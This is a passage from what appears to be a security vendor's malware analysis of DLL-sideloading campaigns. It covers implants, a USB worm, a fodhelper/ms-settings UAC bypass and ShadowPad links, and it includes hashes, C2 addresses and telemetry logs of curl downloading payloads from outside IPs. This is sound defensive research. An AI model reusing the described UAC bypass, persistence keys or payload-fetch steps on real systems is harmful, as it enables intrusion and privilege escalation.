online&#8217;.<\/p>\n<h4>free.plg<\/h4>\n<p>Compile time stamp: 2021-Aug-19 21:21:29<\/p>\n<p>This stops the current service, creates the event Global\\ACT, then calls the sendSAS function of sas.dll with parameter 0. 
It then loads local.plg (if the service was found) and main.plg, all expected in C:\\ProgramData\\Netsky. main.plg is hollowed into a dllhost.exe process.<\/p>\n<p>It opens C:\\ProgramData\\Netsky\\vs_session.dat, which appears to be a flag file (though we were unable to recover it for examination). If the file is not present, the process keeps checking in a loop.<\/p>\n<h4>local.plg<\/h4>\n<p>This contains the encrypted config, using a different encryption method than the implants. The decoded data contains these strings:<\/p>\n<pre>cfg_find_tag  test  188.127.237.27  188.127.237.27  674e8fb2f2c8d8699200d56493722c90<\/pre>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image9.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87835\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image9.png\" alt=\"Hex dump of a config, showing an IP address\" width=\"640\" height=\"375\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image9.png 1150w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image9.png?resize=300,176 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image9.png?resize=768,450 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image9.png?resize=1024,600 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 9: A screenshot taken from a memory dump<\/em><\/p>\n<h4>main.plg<\/h4>\n<p>Compile time stamp: 2021-Aug-19 21:04:16<\/p>\n<p>During installation this implant is hollowed into dllhost.exe. It contains the embedded vtcp.dll from the <a href=\"https:\/\/github.com\/m0n0ph1\/malware-1\/blob\/master\/Trochilus\/bin\/Bin\/vtcp.dll\">Trochilus RAT collection<\/a>.<\/p>\n<p>This DLL is loaded into memory, gets the exports from vtcp.dll, and uses them later in communication.<\/p>\n<p>vtcp.dll uses CNetDiskClientSocket vftable functions for communication. It reads in and decrypts local.plg. 
It has a predefined hardcoded data structure that is overwritten with the decoded content. This hardcoded structure could be used in testing, or when no local.plg file is found. The content of this hardcoded config is:<\/p>\n<pre>cfg_find_tag  mark  192.168.211.1  192.168.211.1<\/pre>\n<p>It registers the application as class \u201cMSN Shessll &#8211; %d\u201d; the number is generated by a call to the Windows API function GetTickCount. Next, it logs keystrokes to a file.\u00a0 It creates dir.dat in both C:\\ProgramData\\Netsky and C:\\Users\\All Users. Both files will contain the name of the directory where the sideloading components were installed, in this case C:\\ProgramData\\Netsky.<\/p>\n<p>The process generates debug logs during execution, as shown in Figure 10:<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image10.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87836\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image10.png\" alt=\"Screenshot showing events being logged\" width=\"446\" height=\"215\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image10.png 446w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image10.png?resize=300,145 300w\" sizes=\"auto, (max-width: 446px) 100vw, 446px\" \/><\/a><\/p>\n<p><em>Figure 10: Logs generated by the process<\/em><\/p>\n<h3>Case 4: Scenario D, the USB disk hijacker<\/h3>\n<p>Based on the internal development info stored in the files, this scenario goes by the code name \u201cU Disk Hijacking.\u201d<\/p>\n<h4>Sideloader DLLs<\/h4>\n<h4><em>u2ec.dll<\/em><\/h4>\n<pre>Creation Time\u00a0\u00a0 2021-09-01 09:23:30 UTC  First Submission 2022-01-02 04:07:47 UTC<\/pre>\n<p>Contains the PDB path:<\/p>\n<p>G:projectAPTU\u76d8\u52ab\u6301newu2ecReleaseu2ec.pdb<\/p>\n<p>(Translation of Chinese text: U Disk Hijacking)<\/p>\n<p>We found a variation of this file on VirusTotal. 
The only difference is some appended data:<\/p>\n<pre>MD5 230c9a22104d5363d2e2738a6ac62b80  SHA-1\u00a0\u00a0 a693a273a23ec3ad274469492dc8db9f85f31c8f  SHA-256 a519c4e5dadd68c2301e65689857907941af23565bc19bb938fd3c51ff5f34ca<\/pre>\n<h4><em>Implants<\/em><\/h4>\n<p>The implants are stored in an encrypted format. They are decoded by the loader shellcode. These implants are DLL files with no exports; the main code is the entry code.<\/p>\n<h4>usb.ini<\/h4>\n<p>Interestingly, this artifact does not appear to do any C2 communication.<\/p>\n<p>PDB File Name : G:projectAPTU\u76d8\u52ab\u6301newshellcodeReleaseshellcode.pdb<\/p>\n<p>(Chinese text: U Disk Hijacking)<\/p>\n<p>The icon and the name of the executable spoof a removable drive, thus tricking the victim into clicking on it. The directory listing would look as shown in Figure 11:<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image11.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87837\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image11.png\" alt=\"Screenshot of a directory listing, showing a spoofed removable USB\" width=\"316\" height=\"398\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image11.png 316w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image11.png?resize=238,300 238w\" sizes=\"auto, (max-width: 316px) 100vw, 316px\" \/><\/a><\/p>\n<p><em>Figure 11: The spoofed icon<\/em><\/p>\n<p>Then a warning may be displayed:<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image12.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87838\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image12.png\" alt=\"Screenshot of a Windows security warning\" width=\"616\" height=\"444\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image12.png 616w, 
https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image12.png?resize=300,216 300w\" sizes=\"auto, (max-width: 616px) 100vw, 616px\" \/><\/a><\/p>\n<p><em>Figure 12: Windows flags the attempt to run the file, but the information the user sees inspires trust<\/em><\/p>\n<p>However, because the executable is (apparently) clean and signed, the victim is not suspicious.<\/p>\n<p>If it is not running from a path that contains \u2018programdata\u2019, it infects the computer and proceeds to do the following creation and copying actions:<\/p>\n<p>It creates the installation directory udisk and copies document\/image files there, then copies every file from the current directory (the directory returned by GetModuleFileName) to c:\\programdata\\udisk.<\/p>\n<p>It creates the following autorun key in the registry:<\/p>\n<pre>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\u00a0\u00a0 udisk    c:\\programdata\\udisk\\disk_watch.exe<\/pre>\n<p>It then copies itself to the following locations and executes those copies:<\/p>\n<pre>c:\\programdata\\udisk\\disk_watch.exe  c:\\programdata\\udisk\\DateCheck.exe<\/pre>\n<p>If it is running as disk_watch.exe, it infects USB disks by replicating itself there.<\/p>\n<p>This is the timeline of the infection process from the logs:<\/p>\n<p>First, u2ec.dll loads the payload:<\/p>\n<pre>2022-05-02T03:26:54.419932Z\u00a0\u00a0 [ e:\\usb drive.exe::13956 ]\u00a0\u00a0\u00a0\u00a0 ===   FileRead ===&gt;\u00a0\u00a0 [ e:\\u2ec.dll ]  2022-05-02T03:26:55.212781Z\u00a0\u00a0 [ e:\\usb drive.exe::13956 ]\u00a0\u00a0\u00a0\u00a0 ===   FileRead ===&gt;\u00a0\u00a0 [ e:\\autorun.inf\\protection for autorun\\system volume information\\usb.ini ]<\/pre>\n<p>Then, files (documents created in the root by the user rather than the worm itself) are copied to the installation directory, as are instances of the worm and components of the other sideloading scenarios. 
After all that, an autorun registry key is created:<\/p>\n<pre>2022-05-02T03:27:46.035555Z\u00a0\u00a0 [ e:\\usb drive.exe::13956 ]\u00a0\u00a0\u00a0\u00a0 ===   RegKeySetValue ===&gt;\u00a0\u00a0 [ HKEY_USERS\\S-1-5-21-2519359479-851945054-3016455893-1321\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run ]  2022-05-02T03:27:46.198285Z\u00a0\u00a0 [ e:\\usb drive.exe::13956 ]\u00a0\u00a0\u00a0\u00a0 ===   RegKeySetValue ===&gt;\u00a0\u00a0 [ HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data ]<\/pre>\n<h3>Case 5: Scenario E, the Win10 UAC bypass<\/h3>\n<p>The following components were used:<\/p>\n<pre>c:\\users\\public\\libraries\\out\\symstore.exe :   83e51f9d467977238f9fa5107106918ed5102f1a3e06eeba9a33d21d5df49d6a  c:\\users\\public\\libraries\\out\\symsrv.dll :   9c2f1eeea169f2dd196bc9a0d240d941ccb5a22a050bca856c1a03fd795ac58d  c:\\users\\public\\libraries\\out\\msvcrt.dll :   d8cf89e651a2e1d9f8f653d16ecbca979d6c9459329a015ff825eff38792ed24<\/pre>\n<p>In this case there is no additional encrypted payload file; the sideloaded DLL, symsrv.dll, is the payload itself.<\/p>\n<h4>SYMSRV.dll<\/h4>\n<p>PDB path:<\/p>\n<p><em>C:\\Users\\admin\\Desktop\\djwklqjdlwqjldwqjlkfjwlqkjlqwjglqwjglqjlgjwqkjgk\\SYMSRV.pdb<\/em><\/p>\n<p>This is a 64-bit loader DLL that does a UAC bypass trick to execute commands, including the unidentified 3.exe component, as explained in <a href=\"https:\/\/pentestlab.blog\/2017\/06\/07\/uac-bypass-fodhelper\/\">this blog from PenTestLab<\/a>.<\/p>\n<p>The implant executes various commands, which are inserted into the registry key <em>HKCU\\Classes\\ms-settings\\CurVer<\/em>. 
It then tries to execute two different Windows components, both of which are vulnerable to the UAC bypass method:<\/p>\n<pre>c:\\windows\\system32\\fodhelper.exe  c:\\windows\\system32\\ComputerDefaults.exe<\/pre>\n<p>When these clean Windows components are executed, they read the command to be executed from the registry key and run it with higher privileges.<\/p>\n<p>We observed the following commands executed in this fashion:<\/p>\n<pre>C:\\users\\public\\libraries\\3.exe  mkdir C:\\programdata\\googleupdate  C:\\Users\\Public\\Libraries\\out\\googleupdate.exe<\/pre>\n<p>The implant needs to make sure that another execution will not interfere, so it creates a flag in the registry: if it is set, some other command is in progress. The flag key is <em>HKCU\\Classes\\aaabbb32\\shell\\open\\command<\/em>.<\/p>\n<p>The threat actors show strong devotion to the DLL sideloading technique here. This UAC bypass method could have been compiled into any of their implants; instead, the simple logic has been implemented as a standalone sideloading scenario, and the debug features bloated the payload into a huge (1.1MB) DLL file.<\/p>\n<h3>Scenario F: A connection to ShadowPad?<\/h3>\n<p>As mentioned, a VirusTotal hunt led us to additional cases from non-Sophos sources. 
This case was found via VT hunting; it dates from January 2021, but the shared characteristics clearly connect it to our cases from 2022.<\/p>\n<h4>Sideloader DLLs<\/h4>\n<p>The following file was identified:<\/p>\n<pre>73048579a2903918bbcc601cd562e8f93459ad2a562c6537006067b59735b7b6: log.dll  MD5\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 63971f35a4282343eced55ebdfd1cb0b  SHA-1\u00a0\u00a0\u00a0 bee88779a9c65543a9cfa5069b4486131a23e55d  SHA-256 73048579a2903918bbcc601cd562e8f93459ad2a562c6537006067b59735b7b6  Creation Time 2021-01-25 05:43:52 UTC  Signature Date\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 05:48 AM 01\/25\/2021  First Submission\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 2022-01-26 05:43:49 UTC<\/pre>\n<p>Signed by a self-signed digital signature claiming to originate from, but not actually originating from, Bitdefender:<\/p>\n<pre>BitDefender SRL  Name\u00a0\u00a0\u00a0\u00a0\u00a0 BitDefender SRL  Status This certificate or one of the certificates in the certificate chain is not   time valid. The certificate or certificate chain is based on an untrusted root.  
Issuer BitDefender SRL  Valid From\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 05:48 AM 01\/25\/2021  Valid To\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 05:48 AM 01\/25\/2022  Valid Usage\u00a0\u00a0\u00a0\u00a0 All  Algorithm\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 sha256RSA  Thumbprint\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 A9CA14BA90962DEA552F6A5FB2E5970ACF939EDE  Serial Number 01<\/pre>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image13.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87839\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image13.png\" alt=\"Screenshot of a digital certificate's signing details\" width=\"640\" height=\"477\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image13.png 702w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image13.png?resize=300,224 300w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 13: The questionable digital certificate<\/em><\/p>\n<p>It loads the payload from the file qutmain.dat.<\/p>\n<p>This sideloading scenario consists of the following files:<\/p>\n<pre>73048579a2903918bbcc601cd562e8f93459ad2a562c6537006067b59735b7b6 *log.dll  bcc588207d62a44149df54bd948815bdcfe60e7864bae00d6cd619f5d6cc2257 *qutload.dat  7529e60f377b24c60914ec909dbfdc0e60ad9e18fbf9750a4463acf33a7ce16f *qutmain.dat  386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd *qutppy.exe  fb65524f27e847ac073a61d2c3eeae6a9447e34836347bbd7baff22a07cf0b01 *vsserver.dat<\/pre>\n<p>Here, the .dat files are the encrypted plugins; qutppy.exe is the clean loader from Bitdefender (Bitdefender Crash Handler). 
The use of this clean file in sideloading scenarios has been reported (though with different payload files) since early 2021 and attributed to ShadowPad, aka <a href=\"https:\/\/news.sophos.com\/en-us\/2021\/03\/04\/covert-code-faces-a-heap-of-trouble-in-memory\/\">NetSarang<\/a>. (Additionally, Trend Micro detects the encrypted .dat files as Trojan.Win32.SHADOWPAD.CGW.enc.) There is an additional file info.dat, which should contain the actual configuration data, but we weren\u2019t able to recover it.<\/p>\n<p>The log.dll loader uses the same obfuscation as the earlier cases, and the decrypted plugin files use the same shellcode loader. We believe this is a reasonably strong connection with the campaigns in 2022.<\/p>\n<h4>Implants<\/h4>\n<h4>qutmain.dat<\/h4>\n<p>This file is essentially the same as alloc.plg. It refers to the following locations where the installed plugins are stored:<\/p>\n<pre>C:\\ProgramData\\mos\\qutppy.exe  C:\\ProgramData\\mos\\qutload.dat  C:\\ProgramData\\mos\\qutppy.exe online  C:\\ProgramData\\mos\\info.dat  C:\\ProgramData\\mos\\vsserver.dat  C:\\ProgramData\\mos\\qutppy.exe install<\/pre>\n<p>It generates similar debug messages with the <em>[fortest]<\/em> tag as well, and contains exactly the same UAC bypass component.<\/p>\n<h4>qutload.dat<\/h4>\n<p>This is the same as free.plg; only the file paths have changed to reflect the different scenario.<\/p>\n<h4>vsserver.dat<\/h4>\n<p>This is the same as main.plg. It contains the same hardcoded default config values:<\/p>\n<pre>cfg_find_tag  mark  192.168.211.1  192.168.211.1<\/pre>\n<h4>info.dat<\/h4>\n<p>This is the encrypted configuration file. We haven\u2019t been able to recover it.<\/p>\n<h3>Scenario G: The old-timer<\/h3>\n<p>This is a very early sample (from 2017!) that shows the same obfuscation as the newer cases, as well as a similar default hardcoded configuration. 
It was found via VT.<\/p>\n<p>The file info:<\/p>\n<pre>MD5\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 413bb0864c3933009a9cc486f07070e4  SHA-1\u00a0\u00a0\u00a0 f5895c69c995ac8b7f01ff85df9777595fe8b35d  SHA-256 b2a332fb6e896a896f72e6bbbf6351d756f1ab6a57fbe662050ed1c18cad3e4b  Creation Time 2017-03-23 12:20:10 UTC  First Submission\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 2017-05-14 05:16:34 UTC<\/pre>\n<p>Contains an embedded executable:<\/p>\n<pre>389058c291b536eb65ba3a65e2024eb6350ff1a5ed48c036692bf5fed4729970<\/pre>\n<p>Some characteristic strings from the embedded executable:<\/p>\n<pre>hTTP\/1.1 403 fORBIDDEN\\r\\n\\r\\n&lt;h1&gt;403 fORBIDDEN&lt;\/h1&gt;  HtTp\/1.0 200 OK\\r\\n\\r\\n  192.168.1.2<\/pre>\n<p>Also, similar config data is stored, but with a different marker at the beginning:<\/p>\n<pre>mmconfig-tag  192.168.1.33  KarSpy  KarSpy  Kar security services<\/pre>\n<p>Sideloading components could be identified from the code:<\/p>\n<pre>%CommonProgramFiles%\\Sandboxie\\SbieDll.dll  %CommonProgramFiles%\\Sandboxie\\Sandboxie.exe  %CommonProgramFiles%\\Sandboxie<\/pre>\n<p>The malicious DLL is identified as gh0st RAT. Details of the payload are unavailable at this time.<\/p>\n<h2>Appendix: A Tour of the Worm Circus<\/h2>\n<p>From our telemetry data we reconstructed the steps of the infection process. Here\u2019s the timeline for Case 4 (\u201cWorm Circus\u201d), the most complex attack. 
This is the one that both delivered a USB worm in its payload and ingested portions of other APTs:<\/p>\n<p>Execution of initial sideloading:<\/p>\n<pre>2022-06-24T03:11:11.519857Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesciscocollabhost.exe::38752 ]\u00a0\u00a0\u00a0 === FileRead ===&gt;  \u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibrariesciscosparklauncher.dll ]  2022-06-24T03:11:11.519857Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesciscocollabhost.exe::38752 ]\u00a0\u00a0\u00a0 === FileRead ===&gt;  \u00a0\u00a0\u00a0\u00a0 [ c:userspublic2831329086.inf ]  Downloading the RAR archive  2022-06-24T04:02:58.673626Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:windowssyswow64curl.exe::36336 ]  \u00a0\u00a0\u00a0 === IpConnector ===&gt;\u00a0\u00a0 [ 103.253.72.116 ]  2022-06-24T04:02:58.793284Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:windowssyswow64curl.exe::36336 ]\u00a0\u00a0\u00a0   === FileWrite ===&gt;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutv1.rar ]<\/pre>\n<p>Unpacking the files of the second sideloading:<\/p>\n<pre>2022-06-24T04:03:54.211485Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::39988 ]\u00a0\u00a0\u00a0\u00a0   === FileWrite ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutsymsrv.dll ]  2022-06-24T04:03:54.243728Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::39988 ]\u00a0\u00a0\u00a0\u00a0   === FileWrite ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutsymstore.exe ]  2022-06-24T04:03:54.249938Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::39988 ]\u00a0\u00a0\u00a0\u00a0   === FileWrite ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutmsvcrt.dll ]  2022-06-24T04:03:54.263187Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::39988 ]\u00a0\u00a0\u00a0\u00a0   === FileRead ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutv1.rar ]<\/pre>\n<p>This shows execution of the second sideloading attack, which creates registry keys to register a 
custom file extension and a custom command to open files of that extension. This could be a persistence tactic, similar to <a href=\"https:\/\/news.sophos.com\/en-us\/2022\/02\/01\/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence\/\">how SolarMarker does it<\/a>.<\/p>\n<pre>2022-06-24T04:05:43.119771Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesoutsymstore.exe::39668 ]\u00a0\u00a0\u00a0 === FileRead ===&gt;  \u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutsymsrv.dll ]  2022-06-24T04:05:43.159707Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesoutsymstore.exe::39668 ]\u00a0\u00a0\u00a0 === RegKeyCreate ===&gt;  \u00a0 \u00a0 \u00a0[ HKEY_USERSS-1-5-21-1497078658-3044148255-4064547459-  1001_<strong>Classesaaabbb32shellopencommand<\/strong> ]  2022-06-24T04:05:43.160709Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesoutsymstore.exe::39668 ]\u00a0\u00a0\u00a0 === RegKeySetValue   ===&gt;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [ HKEY_USERSS-1-5-21-1497078658-3044148255-4064547459-  1001_Classesaaabbb32shellopencommand ]  2022-06-24T04:05:43.161131Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesoutsymstore.exe::39668 ]\u00a0\u00a0\u00a0 === RegKeyCreate ===&gt;   \u00a0 \u00a0 \u00a0 \u00a0[ <strong>HKEY_USERSS-1-5-21-1497078658-3044148255-4064547459-1001_Classesms-<\/strong>  <strong>settingsCurVer<\/strong> ]  2022-06-24T04:05:43.162128Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesoutsymstore.exe::39668 ]\u00a0\u00a0\u00a0 === RegKeySetValue   ===&gt;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [ HKEY_USERSS-1-5-21-1497078658-3044148255-4064547459-  1001_Classesms-settingsCurVer ]<\/pre>\n<p>Creation of yet another 3.exe file (symstore.exe -&gt; fodhelper.exe -&gt; 3.exe)<\/p>\n<pre>2022-06-24T04:05:43.318703Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesoutsymstore.exe::39668 ]\u00a0\u00a0\u00a0 === FileRead ===&gt;  \u00a0\u00a0\u00a0\u00a0 [ c:windowssystem32fodhelper.exe ]  
2022-06-24T04:05:44.215109Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:windowssystem32fodhelper.exe::26224 ]  \u00a0\u00a0\u00a0\u00a0\u00a0 === FileRead ===&gt;\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe ]\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0  2022-06-24T04:05:44.240169Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe::42928 ]   \u00a0 \u00a0 \u00a0 === FileRead ===&gt;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:windowssyswow64hmpalert.dll ]  2022-06-24T04:05:44.242168Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe::42928 ]   \u00a0 \u00a0 \u00a0 === FileRead ===&gt;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:windowssystem32conhost.exe ]<\/pre>\n<p>Fodhelper.exe executes 3.exe. But before that, the registry key HKEY_USERSS-1-5-21-1497078658-3044148255-4064547459-1001_Classesms-settingsCurVer is created. This is likely a UAC bypass method similar to the one Pentestlab <a href=\"https:\/\/pentestlab.blog\/2017\/06\/07\/uac-bypass-fodhelper\/\">described<\/a> in 2017 and more <a href=\"https:\/\/threatpost.com\/trickbot-switches-to-a-new-windows-10-uac-bypass-to-evade-detection\/152477\/\">recently used<\/a> by Trickbot.<\/p>\n<p>The threat actor then executed 3.exe, which deletes the components of sideloading scenarios. Note the presence of the files nvsmartmax.dll and nvsmartmax.dat. 
<a href=\"https:\/\/www.cybereason.com\/blog\/research\/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\">Cybereason has previously reported<\/a> that they are used by a Chinese APT group in their attacks.<\/p>\n<pre>2022-06-24T04:05:44.568617Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe::42928 ]  \u00a0 \u00a0 \u00a0 === FileDelete ===&gt;\u00a0\u00a0\u00a0 [ c:programdatagoogleupdategoogleupdate.exe ]  2022-06-24T04:05:44.570493Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe::42928 ]   \u00a0 \u00a0 \u00a0 === FileDelete ===&gt;\u00a0\u00a0\u00a0 [ c:programdatagoogleupdategoopdate.ja ]  2022-06-24T04:05:44.571488Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe::42928 ]   \u00a0 \u00a0 \u00a0 === FileDelete ===&gt;\u00a0\u00a0\u00a0 [ c:programdatagoogleupdatelibvlc.dll ]  2022-06-24T04:05:44.573479Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe::42928 ]  \u00a0 \u00a0 \u00a0 === FileDelete ===&gt;\u00a0\u00a0\u00a0 [ c:programdatagoogleupdateloader.ja ]  2022-06-24T04:05:44.574480Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe::42928 ]   \u00a0 \u00a0 \u00a0 === FileDelete ===&gt;\u00a0\u00a0\u00a0 [ c:programdatagoogleupdatenvsmartmax.dat ]  2022-06-24T04:05:44.576644Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe::42928 ]   \u00a0 \u00a0 \u00a0 === FileDelete ===&gt;\u00a0\u00a0\u00a0 [ c:programdatagoogleupdatenvsmartmax.dll ]  2022-06-24T04:05:44.577473Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe::42928 ]   \u00a0 \u00a0 \u00a0 === FileDelete ===&gt;\u00a0\u00a0\u00a0 [ c:programdatagoogleupdatetime.sig ]  2022-06-24T04:05:44.580460Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe::42928 ]   \u00a0 \u00a0 \u00a0 === RegKeySetValue ===&gt;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [   HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesbamStateUserSettingsS-  1-5-21-1497078658-3044148255-4064547459-1001 ]<\/pre>\n<p>Downloading the components 
of the third sideloading scenario:<\/p>\n<pre>2022-06-24T04:08:34.208478Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesciscocollabhost.exe::38752 ]\u00a0\u00a0\u00a0 === FileRead ===&gt;  \u00a0\u00a0\u00a0\u00a0 [ c:windowssyswow64cmd.exe ]  2022-06-24T04:08:34.348517Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:windowssyswow64cmd.exe::38472 ]  \u00a0\u00a0\u00a0\u00a0 === FileRead ===&gt;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:windowssyswow64curl.exe ]  2022-06-24T04:08:34.732663Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:windowssyswow64<strong>curl.exe<\/strong>::41216 ]  \u00a0\u00a0\u00a0 === IpConnector ===&gt;\u00a0\u00a0 [ 5.252.178.162 ]  2022-06-24T04:08:35.412783Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:windowssyswow64curl.exe::41216 ]  \u00a0\u00a0\u00a0 === FileWrite ===&gt;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutc.rar ]<\/pre>\n<p>Unpacking the files from the downloaded RAR archive:<\/p>\n<pre>2022-06-24T04:10:14.279520Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::40260 ]  \u00a0\u00a0\u00a0\u00a0 === FileWrite ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutgoopdate.ja ]  2022-06-24T04:10:14.299137Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::40260 ]  \u00a0\u00a0\u00a0\u00a0 === FileWrite ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesout<strong>libvlc.dll<\/strong> ]  2022-06-24T04:10:14.301128Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::40260 ]  \u00a0\u00a0\u00a0\u00a0 === FileWrite ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesout<strong>loader.ja<\/strong> ]  2022-06-24T04:10:14.307180Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::40260 ]  \u00a0\u00a0\u00a0\u00a0 === FileWrite ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesouttime.sig ]  2022-06-24T04:10:14.310114Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::40260 ]  \u00a0\u00a0\u00a0\u00a0 === FileWrite ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutgoogleupdate.exe ]  
